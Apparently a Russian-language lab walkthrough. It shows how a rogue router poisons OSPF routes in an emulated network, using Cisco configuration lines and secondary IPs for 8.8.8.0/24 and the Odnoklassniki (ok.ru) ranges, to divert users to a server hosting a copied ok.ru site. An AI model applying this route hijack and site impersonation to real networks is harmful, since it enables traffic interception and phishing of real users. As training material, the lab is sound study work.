# BGP
Суть: подключаем fake-router, делаем так, что он распространяет отравленные маршруты. Для этого назначим ему на другие интерфейсы сетки/ip, которые хотим подменить. После чего он раздаст маршруты до себя и можно будет перенаправлять трафик себе на Linux-Server
Добавляем к схеме Fake-RouteR (атакующий роутер), Switch (L2), 2 Linux node (Debian Server), Kali
Добавляем Cloud -> CR-4

CR-4

настройки OSPF

CR-5

OSPF

Тестируем, пингуем 8.8.8.8
для того, чтобы маршрут интернета раздавался по ospf нужно настроить
router ospf 1
default-information originate
Для того, чтобы было можно обращаться в интернет нужно настроить NAT
int e0/3
ip nat outside
int range e0/-2
ip nat inside
+правило access-list
access-list 1 permit any
ip nat inside source list 1 int e0/3 overload
**настроим CR-10**
network 11.0.9.0 255.255.255.0 area 0
int e1/0
ip addr 11.0.9.10 255.255.255.0
no shut
Fake-Router Настройки
int e0/0
ip addr 11.0.9.10 255.255.255.0
no shut
int e0/1
ip addr 8.8.8.20 255.255.255.0
router ospf 1
network 11.0.9.0 255.255.255.0 area 0
далее отравляем маршруты через OSPF
сделаем secondary ip на int e0/1 Fake-Router
ip addr 5.61.23.20 255.255.255.0 secondary

Настраиваем интерфейсы на Linux Server

resolve.conf

скачаем одноклассники и разместим на Linux Server, раздавая на NGINX
Правим адрес расположения скаченного сайта

Подключаем Kali к CR-6 Для проверки
Настройки интерфейса

некоторые домены могут использовать балансировку
dig ok.ru - проверка возможных ip адресов ресурса
тогда подцепляем несколько интерфейсов с нужными Ip

добавим ip из этих сетей на роутер (он будет рассылать эти маршруты)
